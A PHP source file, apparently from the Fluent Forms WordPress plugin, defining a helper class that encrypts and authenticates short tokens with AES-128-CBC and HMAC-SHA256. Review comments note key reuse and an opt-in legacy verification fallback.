<?php
namespace FluentForm\App\Helpers;
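/**
 * Symmetric "encrypt then MAC" helper for short tokens.
 *
 * Token layout (before base64): IV || HMAC-SHA256 || AES-128-CBC ciphertext.
 *
 * NOTE(review): the same stored secret is used as the AES key and as the HMAC
 * key. Deriving two separate keys would be cleaner, but it would invalidate
 * every token already issued, so it is left as is here.
 */
class Protector
{
    /**
     * Get the secret used for encryption, decryption and the HMAC.
     *
     * The value is read from the `_fluentform_security_salt` option and is
     * generated and stored the first time it is needed.
     *
     * @return string
     */
    public static function getSalt()
    {
        $salt = get_option('_fluentform_security_salt');
        if (!$salt) {
            // wp_generate_password() defaults to 12 characters, which is shorter
            // than the 16-byte AES-128 key (OpenSSL pads short keys with NUL
            // bytes). Request a long value for newly created salts only; a salt
            // that is already stored is returned unchanged, so existing tokens
            // remain valid.
            $salt = wp_generate_password(64, true, true);
            update_option('_fluentform_security_salt', $salt, 'no');
        }
        return $salt;
    }

    /**
     * Encrypt a text with the stored secret and authenticate the result.
     *
     * @param string $text Plaintext to protect.
     *
     * @return string Base64 of IV, HMAC-SHA256 over (IV + ciphertext), and ciphertext.
     */
    public static function encrypt($text)
    {
        $key = static::getSalt();
        $cipher = 'AES-128-CBC';
        $ivlen = openssl_cipher_iv_length($cipher);
        // A fresh random IV per token.
        $iv = openssl_random_pseudo_bytes($ivlen);
        // NOTE(review): openssl_encrypt() returns false on failure; that case is
        // not surfaced here and yields a token that decrypt() will reject.
        $ciphertext_raw = openssl_encrypt($text, $cipher, $key, OPENSSL_RAW_DATA, $iv);
        // The MAC covers the IV as well as the ciphertext, so neither can be
        // altered without detection.
        $hmac = hash_hmac('sha256', $iv . $ciphertext_raw, $key, true);
        return base64_encode($iv . $hmac . $ciphertext_raw);
    }

    /**
     * Verify and decrypt a token produced by encrypt().
     *
     * @param string $text Base64 token, typically taken from a request.
     *
     * @return string|null The plaintext, or null when the token is not a string,
     *                     is malformed, fails authentication, or cannot be decrypted.
     */
    public static function decrypt($text)
    {
        // Tokens arrive from requests, where a parameter can be an array. On
        // PHP 8 base64_decode() throws a TypeError for that; treat it as an
        // invalid token instead of a fatal error.
        if (!is_string($text)) {
            return null;
        }

        $key = static::getSalt();
        $c = base64_decode($text, true);
        $cipher = 'AES-128-CBC';
        $ivlen = openssl_cipher_iv_length($cipher);
        $sha2len = 32; // raw SHA-256 digest length in bytes
        if ($c === false || strlen($c) < $ivlen + $sha2len) {
            return null;
        }

        $iv = substr($c, 0, $ivlen);
        $hmac = substr($c, $ivlen, $sha2len);
        $ciphertext_raw = substr($c, $ivlen + $sha2len);

        // Verify with current HMAC (IV + ciphertext); hash_equals() keeps the
        // comparison constant-time.
        $calcmac = hash_hmac('sha256', $iv . $ciphertext_raw, $key, true);
        if (!hash_equals($hmac, $calcmac)) {
            // Fallback: verify with legacy HMAC (ciphertext only) for tokens
            // generated before v6.2.0 IV authentication fix. The legacy MAC does
            // not cover the IV, so the fallback stays off unless a site opts in
            // through the filter; it should be enabled only while old tokens
            // are still in circulation.
            if (!apply_filters('fluentform/allow_legacy_token_decrypt', false)) {
                return null;
            }
            $legacymac = hash_hmac('sha256', $ciphertext_raw, $key, true);
            if (!hash_equals($hmac, $legacymac)) {
                return null;
            }
        }

        $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, OPENSSL_RAW_DATA, $iv);
        return $original_plaintext !== false ? $original_plaintext : null;
    }
}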